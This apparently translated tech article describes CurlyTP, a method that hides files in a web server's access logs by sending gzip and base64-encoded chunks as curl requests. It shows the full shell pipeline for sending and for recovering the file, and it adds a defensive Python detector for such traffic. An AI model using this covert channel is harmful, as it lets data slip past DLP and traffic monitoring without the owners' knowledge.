Exchanging secret messages via server logs

According to the Wikipedia definition, a dead drop is a tradecraft method used to exchange information or items between people by means of a secret location. The idea is that the people never meet, yet they still exchange information while maintaining operational security.

The hiding place should not attract attention. That is why, in the offline world, discreet things are often used: a loose brick in a wall, a library book, or a hollow in a tree.

There are many encryption and anonymization tools on the Internet, but the very fact of using them attracts attention. In addition, they may be blocked at the corporate or government level. What to do?

Developer Ryan Flowers proposed an interesting option: use a web server as the hiding place. If you think about it, what does a web server do? It accepts requests, serves files and writes logs. And it logs every request, even the invalid ones!

It turns out that any web server lets you store almost any message in its log. Flowers wondered how to make use of this.

He offers this option:

  1. Take a text file (the secret message) and compute its hash (md5sum).
  2. Encode it (gzip + uuencode).
  3. Write it to the log by sending a deliberately invalid request to the server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode -m g.txt.gz g.txt.gz > g.txt.uue
[root@local ~]# IFS=$'\n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

To read the file, you perform these operations in reverse order: decode and unzip the file, then check the hash (the hash can safely be sent over open channels).

Spaces are replaced with =+= so that the address contains no spaces. The program, which the author calls CurlyTP, uses base64 encoding, like email attachments. The request is made with the keyword ?transfer? so that the recipient can easily find it in the logs.

What do we see in the logs in this case?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

As already mentioned, to receive the secret message you perform the operations in reverse order:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode -o g.gz g.txt.gz.uue

[root@server /home/domain/logs]# gunzip g.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

The process is easy to automate. The md5sum matches, and the contents of the file confirm that everything was decoded correctly.

The method is very simple. "The point of this exercise is just to prove that files can be transferred through innocent little web requests, and it works on any web server with plain text logs. Essentially, every web server is a hiding place!" writes Flowers.

Of course, the method only works if the recipient has access to the server logs. But such access is provided, for example, by many hosting providers.

How can it be used?

Ryan Flowers says that he is not an information security expert and will not compile a list of possible uses for CurlyTP. For him, it is simply a proof of concept that the familiar tools we see every day can be used in unconventional ways.

In fact, this method has a number of advantages over other server "hiding places" such as Digital Dead Drop or PirateBox: it requires no special configuration on the server side and no special protocols, and it will not arouse suspicion among those who monitor traffic. It is unlikely that a SORM or DLP system will scan URLs for compressed text files.
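Whoever can read the access log can still see the channel in it. The following is an added example, not code from the article or from CurlyTP: it flags clients whose requests end in uuencode framing or in repeated high-entropy base64 lines, keying on the shape of the payload because the ?transfer? keyword and the =+= marker are arbitrary. The function names and both thresholds are assumptions.

```python
import math
import re
from collections import Counter, defaultdict

# Combined Log Format: client ident user [time] "METHOD URL PROTO" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)')
B64_RE = re.compile(r'^[A-Za-z0-9+/=]{40,}$')            # one line of base64 text
FRAME_RE = re.compile(r'^begin(-base64)?\W+[0-7]{3}\W')  # uuencode header line
MIN_ENTROPY = 4.5  # bits per character (assumed threshold)
MIN_CHUNKS = 2     # base64-like requests per client before flagging (assumed)

def entropy(s):
    """Shannon entropy of the characters of s, in bits per character."""
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

def last_segment(url):
    """Text after the last '?' or '&' of the URL; '' when there is no query."""
    return re.split(r"[?&]", url)[-1] if "?" in url else ""

def suspicious_clients(lines):
    """Map client -> {"chunks": n, "framed": bool} for clients worth a look."""
    stats = defaultdict(lambda: {"chunks": 0, "framed": False})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, seg = m.group(1), last_segment(m.group(2))
        if FRAME_RE.match(seg):
            stats[client]["framed"] = True
        elif B64_RE.match(seg) and entropy(seg) >= MIN_ENTROPY:
            stats[client]["chunks"] += 1
    return {c: s for c, s in stats.items()
            if s["framed"] or s["chunks"] >= MIN_CHUNKS}

# First three lines: the article's log excerpt. The rest: constructed benign traffic.
SAMPLE_LOG = [
    '1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '192.0.2.10 - - [22/Aug/2019:21:13:00 -0400] "GET /search?q=dead+drop&page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Aug/2019:21:13:10 -0400] "GET /track?pad=' + "a" * 48 + ' HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Aug/2019:21:13:11 -0400] "GET /track?pad=' + "a" * 48 + ' HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [22/Aug/2019:21:14:00 -0400] "GET /reset?token=Zm9yIGV4YW1wbGUgb25seSwgbm90IGEgcmVhbCB0b2tlbiE9PQ HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, s in suspicious_clients(SAMPLE_LOG).items():
        print(client, s)
```

The entropy check keeps long but repetitive query strings out of the count, and the per-client threshold keeps a single long token (a reset link, a tracking id) from raising a flag on its own.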

This is one way of passing messages through service files. You may recall that some advanced companies used to place developer job postings in HTTP headers or in the code of HTML pages.


The idea was that only web developers would see this Easter egg, since an ordinary person would not look at the headers or the HTML code.


Source: www.hab.com
